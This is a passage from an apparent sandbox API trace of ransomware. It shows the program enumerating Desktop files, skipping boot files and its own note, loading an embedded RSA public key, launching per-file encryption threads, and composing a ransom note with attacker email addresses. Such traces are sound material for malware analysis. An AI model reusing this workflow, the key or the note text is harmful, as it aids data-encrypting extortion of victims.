HALPmcxz\\Desktop", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0169.643] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="KZ7l4KmpPgbeETV_wvF" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF" [0169.643] SetErrorMode (uMode=0x1) returned 0x1 [0169.643] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF" [0169.643] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\" [0169.643] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\" [0169.643] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\*.*" [0169.643] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x43728b8 [0169.644] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF") returned="KZ7l4KmpPgbeETV_wvF" [0169.644] lstrcpyW (in: lpString1=0x17b644, lpString2="KZ7l4KmpPgbeETV_wvF" | out: lpString1="KZ7l4KmpPgbeETV_wvF") returned="KZ7l4KmpPgbeETV_wvF" [0169.644] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0169.644] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0169.644] lstrcmpW (lpString1="5OmbcR7YDw3.bmp", lpString2="..") returned 1 [0169.644] lstrcmpW (lpString1="5OmbcR7YDw3.bmp", lpString2=".") returned 1 [0169.644] StrStrW (lpFirst="5OmbcR7YDw3.bmp", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0169.644] StrStrW (lpFirst="5OmbcR7YDw3.bmp", lpSrch="ntldr") returned 0x0 [0169.644] StrStrW (lpFirst="5OmbcR7YDw3.bmp", lpSrch="NTLDR") returned 0x0 [0169.644] StrStrW (lpFirst="5OmbcR7YDw3.bmp", lpSrch="NTDETECT.COM") returned 0x0 [0169.644] StrStrW (lpFirst="5OmbcR7YDw3.bmp", lpSrch="ntdetect.com") returned 0x0 [0169.644] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\") returned 62 [0169.644] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\") [0169.644] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0169.644] lstrcpyW (in: lpString1=0x17be7c, lpString2="5OmbcR7YDw3.bmp" | out: lpString1="5OmbcR7YDw3.bmp") returned="5OmbcR7YDw3.bmp" [0169.644] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\" [0169.644] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x9c8 [0169.644] Sleep (dwMilliseconds=0x96) [0169.796] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0169.796] lstrcmpW (lpString1="iyIk6.jpg", lpString2="..") returned 1 [0169.796] lstrcmpW (lpString1="iyIk6.jpg", lpString2=".") returned 1 [0169.796] StrStrW (lpFirst="iyIk6.jpg", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0169.796] StrStrW (lpFirst="iyIk6.jpg", lpSrch="ntldr") returned 0x0 [0169.796] StrStrW (lpFirst="iyIk6.jpg", lpSrch="NTLDR") returned 0x0 [0169.796] StrStrW (lpFirst="iyIk6.jpg", lpSrch="NTDETECT.COM") returned 0x0 [0169.796] StrStrW (lpFirst="iyIk6.jpg", lpSrch="ntdetect.com") returned 0x0 [0169.796] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\") returned 62 [0169.796] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\") [0169.796] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0169.796] lstrcpyW (in: lpString1=0x17be7c, lpString2="iyIk6.jpg" | out: lpString1="iyIk6.jpg") returned="iyIk6.jpg" [0169.796] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\" [0169.796] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x9d4 [0169.796] Sleep (dwMilliseconds=0x96) [0169.952] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0169.952] lstrcmpW (lpString1="rVKi.xlsx", lpString2="..") returned 1 [0169.952] lstrcmpW (lpString1="rVKi.xlsx", lpString2=".") returned 1 [0169.952] StrStrW (lpFirst="rVKi.xlsx", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0169.952] StrStrW (lpFirst="rVKi.xlsx", lpSrch="ntldr") returned 0x0 [0169.952] StrStrW (lpFirst="rVKi.xlsx", lpSrch="NTLDR") returned 0x0 [0169.952] StrStrW (lpFirst="rVKi.xlsx", lpSrch="NTDETECT.COM") returned 0x0 [0169.952] StrStrW (lpFirst="rVKi.xlsx", lpSrch="ntdetect.com") returned 0x0 [0169.952] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\") returned 62 [0169.952] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\") [0169.952] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0169.952] lstrcpyW (in: lpString1=0x17be7c, lpString2="rVKi.xlsx" | out: lpString1="rVKi.xlsx") returned="rVKi.xlsx" [0169.952] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\" [0169.952] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x9d0 [0169.953] Sleep (dwMilliseconds=0x96) [0170.115] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0170.115] lstrcmpW (lpString1="UcgnfCPkkGAfI8Infh.pdf", lpString2="..") returned 1 [0170.115] lstrcmpW (lpString1="UcgnfCPkkGAfI8Infh.pdf", lpString2=".") returned 1 [0170.115] StrStrW (lpFirst="UcgnfCPkkGAfI8Infh.pdf", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0170.115] StrStrW (lpFirst="UcgnfCPkkGAfI8Infh.pdf", lpSrch="ntldr") returned 0x0 [0170.115] StrStrW (lpFirst="UcgnfCPkkGAfI8Infh.pdf", lpSrch="NTLDR") returned 0x0 [0170.115] StrStrW (lpFirst="UcgnfCPkkGAfI8Infh.pdf", lpSrch="NTDETECT.COM") returned 0x0 [0170.115] StrStrW (lpFirst="UcgnfCPkkGAfI8Infh.pdf", lpSrch="ntdetect.com") returned 0x0 [0170.115] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\") returned 62 [0170.115] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\") [0170.115] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0170.115] lstrcpyW (in: lpString1=0x17be7c, lpString2="UcgnfCPkkGAfI8Infh.pdf" | out: lpString1="UcgnfCPkkGAfI8Infh.pdf") returned="UcgnfCPkkGAfI8Infh.pdf" [0170.116] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\" [0170.116] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x9d8 [0170.116] Sleep (dwMilliseconds=0x96) [0170.264] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0170.264] lstrcmpW (lpString1="XiCIIZYNum_VSBs.wav", lpString2="..") returned 1 [0170.264] lstrcmpW (lpString1="XiCIIZYNum_VSBs.wav", lpString2=".") returned 1 [0170.264] StrStrW (lpFirst="XiCIIZYNum_VSBs.wav", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0170.264] StrStrW (lpFirst="XiCIIZYNum_VSBs.wav", lpSrch="ntldr") returned 0x0 [0170.264] StrStrW (lpFirst="XiCIIZYNum_VSBs.wav", lpSrch="NTLDR") returned 0x0 [0170.264] StrStrW (lpFirst="XiCIIZYNum_VSBs.wav", lpSrch="NTDETECT.COM") returned 0x0 [0170.264] StrStrW (lpFirst="XiCIIZYNum_VSBs.wav", lpSrch="ntdetect.com") returned 0x0 [0170.264] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\") returned 62 [0170.264] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\") [0170.264] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0170.264] lstrcpyW (in: lpString1=0x17be7c, lpString2="XiCIIZYNum_VSBs.wav" | out: lpString1="XiCIIZYNum_VSBs.wav") returned="XiCIIZYNum_VSBs.wav" [0170.264] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\" [0170.264] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x9dc [0170.264] Sleep (dwMilliseconds=0x96) [0170.420] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0170.420] lstrcmpW (lpString1="ZxQsBuyh.ods", lpString2="..") returned 1 [0170.420] lstrcmpW (lpString1="ZxQsBuyh.ods", lpString2=".") returned 1 [0170.420] StrStrW (lpFirst="ZxQsBuyh.ods", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0170.420] StrStrW (lpFirst="ZxQsBuyh.ods", lpSrch="ntldr") returned 0x0 [0170.420] StrStrW (lpFirst="ZxQsBuyh.ods", lpSrch="NTLDR") returned 0x0 [0170.420] StrStrW (lpFirst="ZxQsBuyh.ods", lpSrch="NTDETECT.COM") returned 0x0 [0170.420] StrStrW (lpFirst="ZxQsBuyh.ods", lpSrch="ntdetect.com") returned 0x0 [0170.420] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\") returned 62 [0170.420] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\") [0170.420] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0170.420] lstrcpyW (in: lpString1=0x17be7c, lpString2="ZxQsBuyh.ods" | out: lpString1="ZxQsBuyh.ods") returned="ZxQsBuyh.ods" [0170.420] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\" [0170.420] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x9e0 [0170.421] Sleep (dwMilliseconds=0x96) [0170.576] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0170.576] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 1 [0170.576] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 0 [0170.576] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF" [0170.576] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\*.*" [0170.576] SetErrorMode (uMode=0x1) returned 0x1 [0170.576] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\_HELP_INSTRUCTION.TXT") returned 79 [0170.576] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0170.577] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0170.577] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x9e4) returned 0x0 [0170.577] RegQueryValueExW (in: hKey=0x9e4, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x46a400, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x46a400*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0170.577] RegCloseKey (hKey=0x9e4) returned 0x0 [0170.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0170.577] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0170.577] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kz7l4kmppgbeetv_wvf\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.577] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kz7l4kmppgbeetv_wvf\\_help_instruction.txt"), 